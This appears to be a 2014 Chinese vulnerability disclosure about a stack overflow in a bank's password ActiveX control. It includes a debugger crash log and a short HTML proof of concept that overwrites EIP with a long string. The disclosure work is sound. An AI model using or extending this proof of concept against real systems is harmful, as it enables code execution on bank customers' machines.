兴业银行某软件应用可直接远程代码执行挂马

兴业银行的密码控件ProBank_Edt.ocx控件的PkEncryptEPin函数存在堆栈溢出，传入超长字符串

就会导致堆栈溢出，EIP被控制，直接0x41414141

密码控件下载链接https://**.**.**.**/pers/main/resources/js/CIB_Plugin.exe

crashinfo：

ModLoad: 03750000 03764000   C:/PROGRA~1/PROBAN~1/PROBAN~1.OCX
 ModLoad: 73d30000 73e2e000   C:/WINDOWS/system32/MFC42.DLL
 ModLoad: 61be0000 61bed000   C:/WINDOWS/system32/MFC42LOC.DLL
 (e10.1ec): Break instruction exception - code 80000003 (first chance)
 eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
 eip=7c92120e esp=036cffcc ebp=036cfff4 iopl=0         nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
 *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/WINDOWS/system32/ntdll.dll - 
 ntdll!DbgBreakPoint:
 7c92120e cc              int     3
 Missing image name, possible paged-out or corrupt data.
 0:016> g
 (e10.f14): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 eax=00004000 ebx=77c0f931 ecx=00000875 edx=020dd8dc esi=03878e40 edi=020e0000
 eip=03755197 esp=020dd8b8 ebp=0387b030 iopl=0         nv up ei pl nz na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
 *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/PROGRA~1/PROBAN~1/PROBAN~1.OCX - 
 PROBAN_1!DllUnregisterServer+0x3127:
 03755197 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
 0:008> g
 (e10.f14): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 eax=00000000 ebx=00000000 ecx=41414141 edx=7c9232bc esi=00000000 edi=00000000
 eip=41414141 esp=020dd4e8 ebp=020dd508 iopl=0         nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 <Unloaded_pi.dll>+0x41414140:
 41414141 ??              ???

漏洞poc：

<object id='obj' classid='CLSID:{8BE81FD3-B85E-CD48-1179-1B592DDE9815}'></object>
 <script>
 
 argv1="A"
 argv2="A"
 while(argv2.length<16384)
  argv2+=argv2
 
 ret = obj.PkEncryptEPin(argv1,argv2)
 
 </script>

演示过程

安装控件

搭建一个web服务端或者直接本地打开poc.html

浏览器访问poc.html 附图是挂上wingdbg的崩溃信息

可以看到eip直接被控制0x41414141 即为第二个参数"A"的ascii

对输入的参数作严格校验

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-09-26 14:49

厂商回复：

最新状态：

暂无

1. 2014-09-22 20:17 | bey0nd ( 普通白帽子 | Rank:941 漏洞数:148 | 相忘于江湖，不如相濡以沫)

   0

   sf

   1# 回复此人

2. 2014-09-22 20:21 | 魇 ( 普通白帽子 | Rank:1218 漏洞数:107 | 传闻中魇是一个惊世奇男子， 但是除了他华...)

   0

   跪了

   2# 回复此人

3. 2014-09-22 20:24 | 第四维度 ( 实习白帽子 | Rank:90 漏洞数:45 | 将点成线...)

   0

   mark

   3# 回复此人

4. 2014-09-22 20:25 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力，而是努力了才...)

   0

   .....

   4# 回复此人

5. 2014-09-22 20:47 | 爱上平顶山 ( 核心白帽子 | Rank:3144 漏洞数:625 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

   0

   good

   5# 回复此人

6. 2014-09-22 20:48 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

   0

   跪了

   6# 回复此人

7. 2014-09-22 21:00 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

   0

   噗通

   7# 回复此人

8. 2014-09-22 21:34 | 小威 ( 普通白帽子 | Rank:535 漏洞数:87 | 活到老，学到老!)

   0

   大神，请收下我的膝盖~

   8# 回复此人

9. 2014-09-22 22:34 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

   0

   下面请欣赏新疆歌舞，牵起你的头盖骨。

   9# 回复此人

10. 2014-09-22 22:38 | scanf ( 核心白帽子 | Rank:1694 漏洞数:237 | 。)

    0

    路过

    10# 回复此人

11. 2014-09-22 23:04 | sin ( 实习白帽子 | Rank:38 漏洞数:2 )

    0

    请收下膝盖~

    11# 回复此人

12. 2014-09-23 09:09 | 大亮 ( 普通白帽子 | Rank:386 漏洞数:73 | 小段子手)

    0

    黑了银行能转账吗

    12# 回复此人

13. 2014-09-23 09:32 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸！)

    0

    啪啪啪

    13# 回复此人

14. 2014-09-23 10:59 | scanf ( 核心白帽子 | Rank:1694 漏洞数:237 | 。)

    0

    还是把水表拆了吧

    14# 回复此人

15. 2014-09-23 14:44 | 飞天鼠 ( 路人 | Rank:0 漏洞数:1 | 努力学习)

    0

    跪了

    15# 回复此人

16. 2014-09-23 14:46 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    0

    G B！

    16# 回复此人

17. 2014-09-26 22:02 | Beep ( 实习白帽子 | Rank:80 漏洞数:5 | 专注PHP漏洞挖掘)

    0

    才10rank。。啥样子的代码执行

    17# 回复此人

18. 2014-10-11 11:03 | xiaohao ( 路人 | Rank:5 漏洞数:1 | 我要去找到那力量，让所有的生命都超越界限...)

    0

    。。。看到简介，莫非是。。。应该是那类。。

    18# 回复此人

19. 2014-10-11 11:26 | scanf ( 核心白帽子 | Rank:1694 漏洞数:237 | 。)

    0

    。。。。。。。。。。不过打雷了。。。。。。。。

    19# 回复此人

20. 2014-10-16 15:02 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    0

    逆向牛 我没看懂

    20# 回复此人

21. 2014-11-07 17:39 | blast ( 普通白帽子 | Rank:373 漏洞数:60 | Destruction brings construction)

    0

    这居然才给10r。。

    21# 回复此人

22. 2014-11-07 18:13 | Beep ( 实习白帽子 | Rank:80 漏洞数:5 | 专注PHP漏洞挖掘)

    0

    @blast CERT 我只能呵呵

    22# 回复此人

23. 2014-12-21 20:44 | 炯炯虾 ( 路人 | Rank:2 漏洞数:1 | 我来自地球)

    1

    洞主 你除了会crash还会啥

    23# 回复此人

24. 2014-12-21 23:44 | Xc0d3r ( 路人 | Rank:2 漏洞数:2 | )

    1

    居然没exp？

    24# 回复此人

25. 2014-12-22 09:22 | Neeke ( 普通白帽子 | Rank:110 漏洞数:26 | 额滴歌神呀！)

    1

    才10

    25# 回复此人

26. 2014-12-22 14:15 | 老妖 ( 路人 | Rank:22 漏洞数:3 )

    1

    @Neeke @Xc0d3r 可能正是因为没有exp才10的吧，看样子直接覆盖eip，exp应该好写

    26# 回复此人

27. 2014-12-22 23:01 | ywledoc ( 路人 | Rank:8 漏洞数:3 | 长期小打小闹)

    1

    esp,ebp没破坏，call ecx？真逗的代码

    27# 回复此人